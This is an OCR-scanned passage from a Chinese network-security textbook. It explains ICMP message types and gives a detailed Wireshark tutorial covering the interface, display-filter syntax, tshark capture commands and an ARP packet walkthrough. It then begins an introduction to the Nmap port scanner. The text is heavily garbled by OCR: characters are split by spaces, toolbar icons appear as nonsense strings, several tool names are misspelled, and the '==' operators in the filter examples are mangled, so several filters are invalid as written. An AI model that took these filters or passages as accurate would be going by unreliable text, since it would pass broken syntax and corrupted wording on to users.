(2) 重 定向 报 文 : 当 路 由 器 检测 到 一 台 主 机 使 用 非 优化 路 由 时 , 它 向 该 主机 发 送 一 个 
外 定向 的 ICMP 报 文 ,请 求 该 主机 改变 路 由 并 把 初始 数据 报 向 它 的 目的 站 转发 。 

3) 请 求 /应 答 报 文 

(1) 回应 请 求 /应 答 报 文 : 测试 信 宿 机 或 路 由 器 是 否 可 以 到 达 。ping 命令 就 是 利用 回 
应 请 求 /应 答 报 文 测试 信 宿 机 是 否 可 以 到 达 。 图 1-12 是 ping 应 用 层 直接 使 用 网 络 层 ICMP 
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[hh 


的 一 个 例子 , 它 没有 通过 运输 层 的 TCP 或 UDP。 


B 可 以 到 达 吗 ? ) 主机 A 主机 B 
| ] 3 


一 一 ICMP 回 声 请 求 


一 一 一 ICMP 回 声 应 答 


图 1-12 ping 产生 的 回声 应 等 


著名 的 路 由 跟踪 命令 tracert ,就 是 基于 ICMP 和 UDP 协议 的 。 

(2) 时 间 戳 请 求 /应 答 报 文 : 同步 互联 网 中 各 个 主机 的 时 钟 。 

(3) 地 址 掩 码 请 求 /应 符 报 文 : 用 于 无 盘 系 统 在 引导 过 程 中 获取 自己 的 子 网 掩 码 ( 此 报 
文 已 被 废弃 )。 


1.3 常用 工具 软件 


在 网 络 与 信息 安全 实践 中 ,对 网 络 信息 环境 进行 各 种 分 析 , 常 常 需 要 借助 一 些 工 具 软 
件 。 这 些 工具 种 类 繁多 ,本 节 主 要 介绍 3 款 扫描 分 析 工 具 和 MATLAB 的 图 像 处 理工 具 。 


1.3.1 网 络 包 分 析 工 具 Wireshark 


Wireshark 是 常用 的 网 络 包 分 析 工 具 。 网 络 包 分 析 工 具 的 主要 作用 是 尝试 捕获 网 络 
包 , 并 显示 包 的 尽 可 能 详细 的 情况 。 

网 络 分 析 通 常 分 为 4 种 方式 : 基于 流量 镜像 协议 分 析 、 基 于 SNMP 的 流量 监测 技术 、 
基于 网 络 探 针 (probe) 技 术 和 基于 流 (flow) 的 流量 分 析 。 而 Wireshark 就 是 基于 流量 镜像 
协议 分 析 。 流 量 镜 像 协 议 分 析 方式 是 把 网 络 设 备 的 某 个 端口 ( 链 路 ) 流 量 镜 像 给 协议 分 析 
仪 , 通 过 七 层 协议 解码 对 网 络 流量 进行 监测 。 但 该 方法 主要 侧重 于 协议 分 析 , 而 非 用 户 流量 
访问 统计 和 趋势 分 析 , 仅 能 对 流 经 接口 的 数据 包 进 行 分 析 ,无 法 满足 大 流量 的 抓 包 和 趋势 分 
析 的 要 求 。 

Wireshark 是 Etheral 更 高 级 的 版 本 ,包含 WinPcap。 它 具有 方便 易 用 的 图 形 界面 和 众 
多 分 类 信息 及 过 滤 选 项 ,是 一 款 免费 .开源 的 网 络 协议 检测 软件 。Wireshark 通常 运行 在 路 
由 器 或 有 路 由 功能 的 主机 上 ,这样 就 能 对 大 量 的 数据 进行 监控 ,几乎 能 得 到 以 太 网 上 传送 的 
任何 数据 包 。Wireshark 有 Wireshark-win32 和 Wireshark-win64 两 个 版 本 ,前 者 为 32 位 
版 本 ,后 者 为 64 位 版 本 。Wireshark-win32 可 在 大 多 数 计 算 机 系统 上 运行 , Wireshark- 
win64 必须 安装 在 64 位 CPU 的 计算 机 和 64 位 操作 系统 上 。 该 软件 可 到 Wireshark 的 官 
方 网 站 http://www. wireshark. org/ download. html 下 载 最 新 版 本 。 

Wireshark 不 是 人 侵 侦 测 软件 。 对 于 网 络 上 的 异常 流量 行为 , Wireshark 不 会 产生 警示 
或 任何 提示 。 通 过 仔细 分 析 Wireshark 截取 的 数据 包 能 够 帮助 使 用 者 对 于 网 络 行为 有 更 清 

忆 


楚 的 了 解 。Wireshark 没有 数据 包 生 成 器 ,因而 只 能 查看 数据 包 而 不 能 修改 , 它 


被 抓 取 的 数据 包 的 信息 ,并 对 其 内 容 进 行 分 析 。 


只 会 反映 出 


在 以 太 网 或 者 其 他 共享 网 络 介质 中 ,以 太 网 网 卡 是 先 接收 到 所 有 的 数据 帧 ,然后 与 自身 


的 MAC 地 址 进行 对 比 ,再 将 目的 MAC 地 址 与 自身 一 致 或 者 为 广播 地 址 的 数据 帧 提取 六 


让 


传送 到 上 层 。 而 物理 网 卡 有 一 种 混杂 模式 (promiscuous mode) ,可 以 把 所 有 数据 帧 都 接收 
并 传 到 上 层 。Wireshark 就 是 根据 这 个 原理 ,将 网 卡 设置 成 混杂 模式 并 抓 取 到 所 有 共享 网 
络 中 的 数据 帧 。Wireshark 使 用 tcpdum 和 Liunx 下 的 libpcab 库 直 接 同 硬件 驱动 接触 ,可 
以 不 经 过 操作 系统 ,保证 了 抓 包 速率 和 抓 包 的 精确 性 ,并 可 以 通过 图 形 界面 浏览 这 些 数 据 ， 


可 以 查看 到 数据 包 中 每 一 层 的 详细 内 容 。Wireshark 包含 强大 的 显示 过 滤器 语 
TCP 会 话 重 构 流 的 能 力 ,支持 众多 的 协议 种 类 。 

1.3.1.1 Wireshark 主 窗口 组 成 

启动 Wireshark, 出 现 如 图 1-13 所 示 的 主 窗口 。 
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图 1-13 Wireshark 主 窗口 


言 与 查看 


Wireshark 主 窗 口 由 菜单 栏 工 具 栏 、 过 滤 工 具 栏 ,数据 帧 列表 面板 、 数 据 帧 详情 面板 、 


数据 帧 字 节 面板 .状态 栏 等 组 成 。 
(1) 菜单 栏 : 提供 了 对 Wireshark 进行 配置 的 若干 功能 项 目 
File: 打开 或 保存 捕获 的 信息 。 
Edit: 查找 或 标记 封包 ,进行 全 局 设置 。 
View: 查看 Wireshark 视图 。 
Go: 跳 转 到 捕获 的 数据 。 
Capture: 设置 捕捉 过 滤器 并 开始 捕捉 。 
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Analyze: 设置 分 析 选 项 。 
Statistics: 查看 Wireshark 的 统计 信息 。 
Telphony: 显示 与 电话 业务 相关 的 若干 统计 窗口 ,包括 媒体 分 析 、 流 程 图 .协议 层次 统 


计 等 。 


Tools: 工具 的 启动 项 ,比如 创建 防火 墙 访问 控制 规则 等 。 
Internals: 包含 Wireshark 内 部 信息 的 若干 启动 项 ,比如 罗列 Wireshark 支持 的 协 


议 等 。 


Help: 查看 本 地 或 者 在 线 帮助 。 
(2) 主 工具 栏 : 用 于 快速 访问 菜单 中 经 常用 到 的 功能 项 目 。 


回 关 团 罗 典 国 入 人 加 国内 串 媳 多 个 团 人 人 x 加 了 要 要 思 蜂 蝎 


: 打开 接口 列表 对 话 框 。 

: 打开 捕捉 选项 对 话 框 。 

: 使 用 最 后 一 次 的 捕捉 设置 立即 开始 捕捉 。 
: 停止 当前 的 捕捉 。 

: 停止 当前 捕捉 ,并 立即 重新 开始 。 

: 启动 打开 文件 对 话 框 ,用 于 载 和 文件 。 

: 保存 当前 文件 为 任意 其 他 的 文件 。 

: 关闭 当前 文件 。 若 未 保存 将 会 提示 是 否 保存 。 
: 重新 载 人 当前 文件 。 

: 打印 捕捉 文件 的 全 部 或 部 分 。 

: 打开 一 个 对 话 框 ,查找 包 。 


返回 历史 记录 中 的 上 一 个 包 。 


: 跳 转 到 历史 记录 中 的 下 一 个 包 。 

: 弹出 一 个 设置 跳 转 到 指定 的 包 的 对 话 框 。 
: 跳 转 到 第 一 包 。 

: 跳 转 到 最 后 一 个 包 。 

: 切换 是 否 以 彩色 方式 显示 包 列 表 。 

: 开启 /关闭 实时 捕捉 时 自动 滚动 包 列表 。 


增 大 字体 。 


: 缩小 字体 。 

: 设置 缩放 大 小 为 100%。 

: 重 置 列 宽 ,使 内 容 适合 列 宽 (使 包 列 表 内 的 文字 可 以 完全 显示 )。 
: 打开 对 话 框 ,用 于 创建 ,编辑 过 滤器 (捕获 过 滤 )。 

: 打开 对 话 框 ,用 于 创建 ,编辑 过 滤器 (显示 过 滤 )。 

: 定义 以 色彩 方式 显示 数据 包 的 规则 。 

: 打开 首选 项 对 话 框 。 

: 打开 帮助 对 话 框 。 


(3) 过 滤 工 具 栏 : 提供 处 理 当前 显示 过 滤 的 方法 。 
Filter: 打开 构建 过 滤器 对 话 框 。 
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过 滤 输 入 框 : 在 此 区 域 输入 或 修改 显示 的 过 滤 字 符 . 此 过 程 会 进行 语法 检查 。 如 果 输 
和 人 的 格式 不 正确 或 未 输入 完 , 则 背景 显示 为 红色 。 直 到 输入 合法 的 表达 式 ,背景 才 会 变 为 绿 
色 。 可 以 单 击 下拉 列 表 选 择 先 前 输入 的 过 滤 字 符 。 输 入 完 后 单 击 右边 的 Apply 按钮 或 者 
按 回 车 键 , 即 进行 过 滤 。 

Expression...: 为 表达 式 的 按钮 打开 一 个 对 话 框 用 以 从 协议 字段 列表 中 编辑 过 滤器 。 

Clear: 重 置 当前 过 滤器 ,清除 输入 框 的 内 容 。 

Apply: 应 用 当前 输入 框 的 表达 式 为 过 滤器 进行 过 滤 。 

Save: 保存 过 滤 串 。 

(4) 数据 帧 列表 面板 : 显示 打开 文件 的 每 个 帧 的 摘要 。 单 击 面板 中 的 每 个 条 目 , 帧 的 
其 他 情况 将 会 显示 在 另外 两 个 面板 中 。 

列表 中 的 每 行 显示 捕获 文件 的 一 个 数据 帧 。 如 果 选 择 其 中 一 行 , 该 数据 帧 的 更 多 情况 
会 显示 在 数据 帧 详情 面板 和 数据 帧 字 节 面板 中 , 右 击 数据 帧 .可 以 显示 对 数据 帧 进行 相关 操 
作 的 上 下 文 菜 单 。 

No. : 数据 帧 的 编号 ,编号 不 会 发 生 改 变 , 即 使 进行 了 过 滤 也 同样 如 此 。 

Time: 时 间 截 。 

Source: 数据 帧 的 源 地 址 。 

Destination : 数据 帧 的 目标 地 址 。 

Protocol: 数据 帧 的 协议 类 型 的 简写 。 

Length: 数据 帧 的 长 度 。 

Info: 数据 帧 内 容 的 附加 信息 。 

(5) 数据 帧 详情 面板 : 显示 在 数据 帧 列表 面板 中 所 选 帧 的 数据 解析 结果 。 

数据 帧 详情 面板 显示 当前 数据 帧 (在 数据 帧 列表 面板 被 选中 的 数据 帧 ) 的 详情 列表 。 该 
面板 显示 数据 帧 列表 面板 选中 数据 帧 的 协议 及 协议 字段 ,以 树 状 方式 组 织 。 右 击 这 些 字段 
会 获得 相关 的 上 下 文 菜单 。 

其 中 , 某 些 协议 字段 会 以 特殊 方式 显示 ,例如 : 

Generated fields( 衍 生字 段 ): Wireshark 会 将 自己 生成 的 附加 协议 字段 加 上 括号 。 答 
生字 段 是 通过 该 数据 帧 相关 的 其 他 数据 帧 结合 生成 的 。 例 如 , Wireshark 在 对 TCP 流 应 答 
序列 进行 分 析 时 ,将 会 在 TCP 协议 中 添加 LSEQ/ACK analysis] 字 段 。 

Links( 链 接 ) : 如 果 Wireshark 检测 到 当前 数据 帧 与 其 他 数据 帧 的 关系 ,将 会 产生 一 个 
到 其 他 数据 帧 的 链接 。 链 接 字段 显示 为 蓝 色 字体 ,并 加 有 下 划 线 。 双 击 它 会 跳 转 到 对 应 的 
数据 帧 。 

(6) 数据 帧 字 节 面板 : 显示 在 数据 帧 列表 面板 中 所 选 帧 的 原始 数据 ,以 及 在 数据 帧 详 
情 面板 高 亮 显示 的 字段 。 

数据 帧 字 节 面板 以 十 六 进 制 转 储 方式 显示 当前 选择 数据 帧 的 数据 。 通 常 在 十 六 进 制 转 
储 形式 中 , 左 侧 显示 数据 帧 数据 偏 移 量 ,中 间 栏 以 十 六 进 制 表示 , 右 侧 显示 为 对 应 的 ASCII 
字符 ,用 来 显示 数据 包 在 物理 层 上 传输 时 的 最 终 形式 。 

(7) 状态 栏 : 显示 当前 程序 状态 以 及 捕获 数据 的 更 多 详情 。 

状态 栏 用 于 显示 信息 ,通常 状态 栏 的 左 侧 会 显示 相关 上 下 文 信息 , 右 侧 会 显示 当前 包 
数目 。 

i 


初始 状态 栏 : 该 状态 栏 显示 的 是 没有 文件 载 和 时 的 状态 。 例 如 刚 启动 Wireshark 时 ， 
状态 栏 显 示 “Ready to load or capture”、“No Packets” 和 “Profile: Default”。 

捕获 包 后 的 状态 栏 : 左 侧 显 示 当 前 捕捉 信息 ,包括 临时 文件 名 称 、 大 小 、 捕 提 持 续 时 间 
等 。 右 侧 显 示 当 前 包 在 文件 中 的 数量 ,例如 显示 *Packets: 98 Displayed: 98 Marked: 
0”, 表 示 捕 所 了 98 个 包 、 显 示 98 个 包 、 没 有 被 标记 的 包 。 

Wireshark 的 使 用 主要 有 3 个 步骤 : 先 选择 所 要 抓 取 的 物理 网 卡 , 然 后 选择 过 滤 规 则 ， 
最 后 是 抓 取 数据 包 。 通 过 单 击 抓 取 到 的 数据 包 , 在 下 方 的 窗口 中 查看 数据 包头 以 及 数据 字 
段 等 详细 信息 。 使 用 者 通过 对 相关 协议 知识 的 了 解 , 再 加 上 实验 观察 到 的 现象 ,对 实验 结果 
进行 分 析 和 论证 ,从 而 得 出 所 有 参数 的 含义 。 

实时 捕捉 数据 包 时 ,可 以 使 用 下 面 任 一 方式 开始 捕捉 包 。 

。 使 用 图 1-13 所 示 工 具 栏 中 的 车 按钮 ,打开 捕捉 接口 对 话 框 ,如 图 1-14 所 示 。 浏 览 可 

用 的 本 地 网 络 接口 ,选择 需要 进行 捕捉 的 接口 启动 捕捉 。 
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图 1-14 ”Capture Interfaces 对 话 框 


在 图 1-14 中 ,各 项 意义 如 下 : 

Packets: 从 此 接口 捕 提 到 的 包 的 数目 。 如 果 一 直 没 有 接收 到 包 , 则 会 显示 为 灰色 。 

Packets/s: 最 近 一 秒 捕捉 到 包 的 数目 。 如 果 最 近 一 秒 没 有 捕捉 到 包 , 将 会 是 灰色 显示 。 

Details: 打开 对 话 框 显示 接口 的 详细 信息 。 

Stop: 停止 当前 运行 的 捕捉 。 

Options: 打开 该 接口 的 捕捉 选项 配置 对 话 框 。 

。 使 用 图 1-14 所 示 对 话 框 中 的 Options 按钮 ,启动 捕捉 选项 配置 对 话 框 。 

。 如 果 前 次 捕捉 时 的 设置 和 现在 的 要 求 一 样 ,可 以 单 击 图 1-14 所 示 的 Start 按钮 开始 

本 次 捕捉 。 

启动 捕捉 后 , 即 开始 捕 提 接口 信息 。 当 不 再 需要 捕捉 时 ,可 使 用 工具 栏 上 的 Stop 按钮 
灸 停止 。 

Wireshark 对 包 内 容 的 分 析 主 要 体现 在 两 个 方面 。 主 要 是 包 信 息 , 即 在 中 央 最 大 一 块 
区 域内 的 报 文 信 息 , 主 要 是 查看 解析 后 的 包 内 容 , 比 如 echo 请 求 信息 和 应 答 信息 、TCP 请 
求 SYN、TCP 应 答 包 ACK、HTTP 内 容 信 息 、 包 丢失 信息 等 。 另 外 就 是 非常 详细 的 包 内 容 
分 析 , 在 下 方 的 区 域内 分 别 对 包 大 小 、 类 型 地址、 网 络 协 议和 内 容 进 行 分 析 , 还 可 以 直接 观 
察 到 包 的 原 数 据 内 容 。 

处 理 已 经 捕捉 的 包 , 可 采用 下 列 方法 。 

(1) 浏览 捕捉 的 包 : 在 已 经 捕捉 完成 之 后 (或 者 打开 先前 保存 的 抓 包 文件 时 ) ,通过 单 
击 数据 帧 列表 面板 中 的 包 , 可 以 在 数据 帧 详情 面板 看 到 关于 这 个 包 的 树 状 结构 以 及 字 节 面 
板 ;通过 单 击 左 侧 的 [十 | 标记 ,可 以 展开 树 状 视图 的 任意 部 分 ,并 可 以 通过 在 面板 上 单 击 任意 

让 


字段 来 进行 选择 。 

(2) 数据 包 过 滤 : 有 两 种 过 滤 语 法 ,一 种 在 捕捉 包 时 使 用 , 另 一 种 在 显示 包 时 使 用 。 可 
以 用 协议 、. 预 设 字段 .字段 值 . 字 段 值 比较 等 作为 过 滤 条 件 。 
(3) 建立 显示 过 滤 表 达 式 : Wireshark 提供 了 结构 简单 而 功能 强大 的 过 滤 语 法 ,可 以 用 
它们 建立 复杂 的 过 滤 表 达 式 。 可 以 比较 包 中 的 值 ,合并 表达 式 为 多 个 指定 表达 式 。 一 般 可 
以 采用 显示 过 滤 字 段 、 比 较 值 组合 表 达 式 3 种 方法 。 

(4) 查找 包 : 当 捕 捉 到 一 些 包 以 后 ,或 者 读 取 以 前 存储 的 包 的 时 候 , 可 以 很 容易 地 进行 
查找 。 选 择 Edit| Find Packet 菜单 项 ,将 会 弹出 对 话 框 ,根据 对 话 框 的 提示 即 可 快速 找到 满 
足 条 件 的 包 。 


1.3.1.2 Wireshark 的 过 滤 规 则 

Wireshark 的 一 个 重要 功能 就 是 过 滤器 (filter)。 由 于 Wireshark 所 捕捉 的 数据 较 复 
杂 , 要 迅速 .准确 地 获取 需要 的 信息 ,就 要 使 用 过 滤 工 具 。 可 以 有 两 次 过 滤 : 第 一 次 是 捕捉 
过 滤 ,用 来 筛选 需要 的 捕捉 结果 ;第 二 次 是 显示 过 滤 , 只 将 需要 查看 的 结果 显示 出 来 。 

Filter 位 于 主 工 具 栏 上 ,可 按 规则 输入 过 滤 条 件 。 常 用 的 过 滤 规 则 如 下 。 

(1) 按 协议 类 型 过 滤 。Wireshark 支持 的 协议 包括 TCP.UDP、ARP ICMP 、HTTP、 
SMTP FTP、.DNS .MSN .IP、SSL、OICQ、BOOTP 等 。 例 如 ,只 查看 HTTP 协议 , 则 直接 输 
人 http 。 

(2) 按 IP 地 址 过 滤 。 若 只 要 显示 与 指定 IP( 例 如 192. 168. 0. 123) 通 信 的 记录 , 则 可 输 
入 ip.addr 一 一 192. 168.0. 123。 

如 果 要 限制 为 只 要 从 192. 168. 0. 123 来 的 记录 , 则 输入 ip. src 一 王 192. 168. 0. 123 , 而 
得 到 目的 IP 为 192. 168. 0. 123 的 记录 则 应 输入 ip. dst 王 一 192. 168. 0. 123。 

(3) 按 协 议 模 式 过 滤 。 例 如 HTTP 协议 ,可 以 针对 HTTP 的 请 求 方式 进行 过 滤 , 只 显 
示 发 送 GET 或 POST 请 求 的 过 滤 规 则 : http. request. method 王 王 "GET" 或 http. request. 
method 一 一 "POST"。 

(4) 按 端口 过 滤 。 例 如 tcp. port eq 80。 不 管 端口 是 来 源 的 还 是 目标 的 ,都 只 显示 满足 
tcp. port 一 一 80 条 件 的 包 。 

(5) 按 MAC 地 址 过 滤 。 例 如 以 太 网 头 过 滤 : 


eth.dst==A0:00:00:04:C5:84 // 过 滤 目 标 MAC 
eth.src eq R0:00:00:04:C5:84 // 过 滤 来 源 MAC 


(6) 按 包 长 度 过 滤 。 例 如 udp. length 王 一 26,. 这 个 长 度 是 指 udp 本 身 固定 长 度 8 加 上 
udp 下 面 的 数据 包 之 和 。 而 tcp. len 二 =7 指 的 是 ip 数据 包 (tcp 下 面 的 数据 ) ,不 包括 tcp 
本 身 。ip. len 王 一 94 除了 以 太 网 头 固定 长 度 14, 其 他 都 算是 ip. len, 即 从 ip 本 身 到 最 后 。 
frame. len 王 王 119 指 整个 数据 包 长 度 . 从 eth 开始 到 最 后 . 即 eth->~ip 或 arp-tcp 或 udp 一 


数据 。 
(7) 按 参数 过 滤 。 例 如 按 TCP 参数 过 滤 : 
tcp.flags // 显 示 包 含 TCP 标志 的 数据 包 
tcp.flags.syn==0x02 // 显 示 包 含 TCP SYN 标 志 的 数据 包 


。28 。 


(8) 按 内 容 过 滤 。 例 如 : 


tcp [20] // 表 示 从 20 开 始 , 取 1 个 字符 
tcp[20:] // 表 示 从 20 开始 , 取 1 个 字符 以 上 
tcp [20:8] // 表 示 从 20 开始, 取 8 个 字符 


(9) 采用 人 逻辑 运算 过 滤 。 过 滤 语 句 可 利用 &&< (表示 “与 ”7、|| (表示 “或 ”) 和 ! (表示 
“ 非 ”) 来 组 合 使 用 多 个 限制 规则 ,例如 (http && ip. dst 王 一 192. 168. 0. 123) dns。 再 如 
要 排除 arp 包 , 则 使 用 !arp 或 者 not arp。 

在 使 用 过 滤器 时 ,如 果 填 人 的 过 滤 规则 语法 有 误 ,背景 色 会 变 成 红色 ;如 果 填 人 的 过 滤 
规则 合法 , 则 背景 色 是 绿色 的 。 初 学 者 为 减少 错误 ,可 单 击 Filter, 通 过 会 话 窗口 来 使 用 过 
滤器 。 


1.3.1.3 Wireshark 命令 行 抓 包 

除 GUI 界面 外 ,Wireshark 还 提供 了 命令 行 界面 的 操作 方式 ,可 以 直接 在 命令 提示 符 
窗口 下 运行 Wireshark 进行 抓 包 。 使 用 时 须 先进 入 命令 提示 符 窗口 ,再 进入 Wireshark 的 
安装 目录 ,然后 在 命令 行 输入 Wireshark -h, 就 可 以 看 到 Wireshark 的 使 用 帮助 。 

Wireshark 还 配置 了 一 些 命令 行 工 具 , 例如 tshark、dumpcap、capinfos、 editcap、 
mergecap。 

一 个 Winshark 的 命令 行 抓 包 过 程 大 致 如 下 : 

(1) 进入 软件 安装 路 径 , 例 如 C: \Program Files\Wireshark。 

(2) 用 tshark -D 找 出 使 用 中 的 网 卡 对 应 的 序号 。 

(3) 执行 抓 包 命令 : tshark -i 网 卡 序号 -w 保存 的 文件 名 . pcap。 

命令 执行 开始 后 ,可 以 看 到 抓 包 数 字 一 直 在 递增 ,如 没有 ,应 该 检查 网 卡 序号 是 否 正确 。 

(4) 按 Ctrl 十 C 键 结束 抓 包 。 

使 用 命令 行 抓 包 时 ,要 注意 以 下 问题 : 

(1) 如 果 使 用 GUI 界面 模式 操作 (wireshark. exe) ,由 于 需要 实时 分 析 , 可 能 会 给 CPU 
和 内 存 造 成 很 大 压力 ,一般 使 用 命令 行 模式 (tshark. exe) 操 作 。 

(2) 抓 包 形成 的 文件 大 小 会 随 着 抓 到 的 包 的 数量 增加 而 快速 增长 ,所 以 要 适时 终止 抓 
包 , 避 免 耗 用 过 多 资源 。 


1.3.1.4 Wireshark 数据 包 捕 获 实例 

下 面 进行 一 次 简单 的 数据 包 捕 获 。 这 里 以 ARP 协议 为 例 演示 数据 的 分 析 过 程 。 首 先 
启动 监听 (没有 设置 捕获 过 滤器 ) ,等 过 一 会 儿 后 .停止 抓 包 。 然 后 在 显示 过 滤器 输入 arp 
(注意 是 小 写 ) 作 为 过 滤 条 件 , 回 车 或 者 单 击 Apply 按钮 ,筛选 出 ARP 分 组 。 某 时 刻 抓 到 的 
ARP 包 如 图 1-15 所 示 。 

Wireshark 窗口 的 数据 帧 列表 的 每 一 行 都 对 应 着 网 络 上 一 个 单独 的 数据 包 。 上 默认 情况 
下 ,每 行 会 显示 数据 包 的 时 间 戳 、 源 地 址 和 目标 地 址 ,所 使 用 的 协议 及 关于 数据 包 的 一 些 信 
息 。 通 过 单 击 此 列表 中 的 某 一 行 .可 以 获悉 更 详细 的 信息 。 

数据 帧 详情 面板 中 间 的 树 状 信息 包含 着 上 部 列表 中 选择 的 某 数据 包 的 详细 信息 。 四 图 
标 揭示 了 包含 在 数据 包 内 的 每 一 层 信息 的 细节 内 容 。 这 部 分 的 信息 分 布 与 查看 的 协议 有 
关 , 一 般 包 含有 物理 层 .数据 链 路 层 、 网 络 层 ,传输 层 等 各 层 信 息 。 
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图 1-15 某 时 刻 抓 到 的 ARP 包 


在 物理 层 , 可 以 得 到 线路 的 字 节 数 和 抓 取 到 的 字 节 数 ,还 有 抓 包 的 时 间 戳 和 距离 第 一 次 
抓 包 的 间隔 等 信息 。 

在 数据 链 路 层 ,可 以 得 到 源 网 卡 物理 地 址 和 目的 网 卡 物理 地 址 ,还 有 帧 类 型 。 

在 网 络 层 , 可 以 得 到 版 本 号 \ 源 IP 和 目的 人 P、 报 头 长 度 、 包 的 总 长 度 、TTL 和 网 络 协议 
等 信息 。 

在 传输 层 , 可 以 得 到 源 端口 和 目的 端口 ,还 有 序列 号 和 控制 位 等 有 效 信息 。 

底部 的 数据 帧 字 节 面板 以 十 六 进 制 及 ASCII 形式 显示 出 数据 包 的 内 容 , 其 内 容 对 应 于 
中 部 数据 帧 详情 面板 的 某 一 行 。 

如 图 1-15 所 示 , 第 1 列 是 捕获 数据 的 编号 ;第 2 列 是 捕获 数据 的 相对 时 间 , 开 始 捕获 时 
为 0.000 秒 ; 第 3 列 是 源 地 址 ;第 4 列 是 目的 地 址 ;第 5 列 是 数据 包 的 信息 。 

经 过 过 滤 ,其 他 的 协议 数据 包 都 被 过 滤 掉 了 ,只 剩 下 ARP 协议 的 包 。 注 意 到 中 间 部 分 
的 3 行 前 面 都 有 一 个 外, 单 击 它 ,这 一 行 就 会 被 展开 。 

先 展开 第 1 行 ,这 一 行 主 要 包含 帧 的 一 些 基本 信息 ,如 图 1-16 所 示 。 

帧 的 编号 : 355( 捕 获 时 的 编号 ) 。 

帧 的 大 小 : 60B。 再 加 上 4B 的 CRC 计算 在 里 面 .就 刚好 满足 最 小 64B 的 要 求 。 

接 下 来 的 信息 还 有 帧 被 捕获 的 日 期 和 时 间 、 帧 距离 前 一 个 帧 的 捕获 时 间 差 、 帧 距离 第 一 
个 帧 的 捕获 时 间 差 等 ,以 及 表明 帧 装载 的 协议 是 ARP。 

接着 展开 第 2 行 ,这 一 行 主要 包含 地 址 一 类 的 信息 ,如 图 1-17 所 示 。 

Destination( 目 的 地 址 ) : ff:ff:ff:ff:ff:ff. 这 是 MAC 广播 地 址 ,局 域 网 中 的 所 有 计算 
机 都 会 接收 这 个 数据 帧 。 

Source( 源 地 址 ) : 00:88:99:00:12 :ff。 

。 30 。 


WTAP_ENCAP : 1 
Arrival Time: Apr 8, 2013 16:06:16.492306000 EBDEBIEBEBEBE] | 
[Time shift for this packet: 0.000000000 seconds] | 
Epoch Time: 1365408376.492306000 seconds 
[Time delta from previous captured frame: 0.010024000 seconds] | 
| [Time delta from previous displayed frame: 7.451400000 seconds] 
[Time since reference or first frame: 11.047289000 seconds] 
Frame Number: 355 
由 Frame Length: 60 bytes (480 bits) 
i Capture Length: 60 bytes (480 bits) 
| [Frame is marked: False] 
| [Frame is ignored: False] 
| [prorocols in frame: eth:arp] 
| [coloring Rule Name: ARP] 
[coloring Rule string: arp] 
Ethernet II, Src: 00:88:99:00:12:ff (00:88:99:00:12:ff), Dst: Broadcast (ff:ff:ff:ff:ff:ff) 
田 Address Resolution Protocol (request) 


1-16 ” 帧 的 基本 信息 


:ff:ff) 
= LG bit: Locally administered address (this is NOT the f| 
= IG bit: Group address (multicast/broadcast) 
fF (00:88:99:00:12:ff) 
2:ff (00:88:99:00:12:ff) 
-= LG bit: Globally unique address (factory default) 
oe 0 ee ee ee oe = IG bit: Individual address (unicast) 
Type: ARP (Ox0806) 
padding: 

田 Address Resolution Prorocol (request) 


图 1-17 地 址 信息 


Type( 帧 中 封装 的 协议 类 型 ): ARP0x0806 ,这 是 ARP 协议 的 类 型 编号 ;Trailer 是 协议 
中 填充 的 数据 ,以 保证 帧 最 少 有 64B。 
再 展开 第 3 行 ,这 一 行 主要 包含 协议 的 格式 ,如 图 1-18 所 示 。 


Hardware type: Ethernet (1) 


Protocol type: IP (0x0800) | 


| Hardware size: 6 
Protocol size: 4 
| opcode: request (1) 
Sender MAC address: 00:88:99:00:12:ff (00:88:99:00:12:ff) 
Sender IP address: 172.18.186.34 (172.18.186.34 
| Targer MAC address: 00:00:00_00:00:00 (00:00:00:00:00:00) 
Targer IP address: 172.18.187.254 (172.18.187.254) 


1-18 数据 包 协议 格式 


地 址 解析 协议 信息 有 硬件 类 型 (以 太 网 ) .协议 类 型 (IP) 硬件 大 小 (6) .协议 大 小 (4) 发 
送 方 MAC 地 址 ,发 送 方 IP 地 址 .目的 MAC 地 址 .目的 IP 地 址 等 。 

通常 在 分 析 时 ,要 结合 协议 的 格式 、 特 点 等 来 进行 。 由 于 很 多 协议 存在 安全 漏洞 ,因此 
对 抓 取 的 数据 包 还 可 以 进行 安全 方面 的 讨论 。 

在 分 析 数 据 包 时 ,数据 包 列 表 的 每 一 行 都 有 背景 色 , 这 对 区 别 不 同 协议 有 一 定 的 作用 。 
深蓝 色 的 行 对 应 着 DNS 通信 , 浅 蓝 色 的 行 是 UDP 通信 ,绿色 行 表 示 HTTP 通信 。 
Wireshark 包括 一 个 复杂 的 颜色 编码 方案 。 要 查看 或 设置 颜色 方案 ,选择 View | Coloring 
Rules 菜单 项 (或 单 击 工具 栏 上 的 蝎 按 钮 ) .可 以 看 到 Coloring Rules 的 颜色 设置 界面 。 
Wireshark 已 经 内 置 了 默认 的 颜色 设置 ,可 以 根据 需要 适当 修改 。 
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总 的 来 说 , Wireshark 是 一 款 功 能 强大 而 操作 相对 简便 的 抓 包 软 件 。 在 进行 网 络 实验 
时 ,往往 采用 抓 包 分 析 的 方法 来 分 析 一 些 实验 , 故 应 熟练 掌握 此 工具 软件 。 


1.3.2 网 络 扫描 器 Nmap 
Nmap(network mapper, 网 络 映射 器 ) 是 由 Fyodor 制作 的 端口 扫描 工具 ,其 官方 网 站 是 


http://www. nmap. com/。 

Nmap 是 一 款 开源 的 扫描 工具 ,用 于 系统 管理 员 查 看 一 个 大 型 的 网 络 有 哪些 主机 以 及 
其 上 运行 何 种 服务 。Nmap 除了 提供 基本 的 TCP 和 UDP 端口 扫描 功能 外 ,还 综合 集成 了 
众多 扫描 技术 ,现在 的 端口 扫描 技术 很 大 程度 上 是 根据 Nmap 的 功能 设置 来 划分 的 。 

Nmap 提供 一 些 实用 功能 ,如 通过 TCP/IP 来 鉴别 操作 系统 类 型 .秘密 扫描 \ 动 态 延 迟 
和 重 发 .平行 扫描 、 通 过 并 行 的 ping 鉴别 主机 存活 、 欺 骗 扫 描 、 端 口 过 滤 探 测 、 直 接 的 RPC 
扫描 、 分 布 扫描 ,灵活 的 目标 选择 以 及 端口 的 描述 。 

Nmap 主要 的 特色 就 是 多 种 扫描 模式 以 及 指纹 识别 技术 。Nmap 采用 一 种 称 为 “TCP 
栈 指纹 鉴别 ”(stack fingerprinting) 的 技术 来 探测 目标 主机 的 操作 系统 类 型 , 据 此 推断 主机 
所 用 的 操作 系统 ,这 是 Nmap 的 一 个 卓越 功能 。 


1. Nmap 功能 架构 图 [主机 发 现 | 


Nmap 功能 架构 图 如 图 1-19 所 示 。 


2。Nmap 的 扫描 过 各 | 
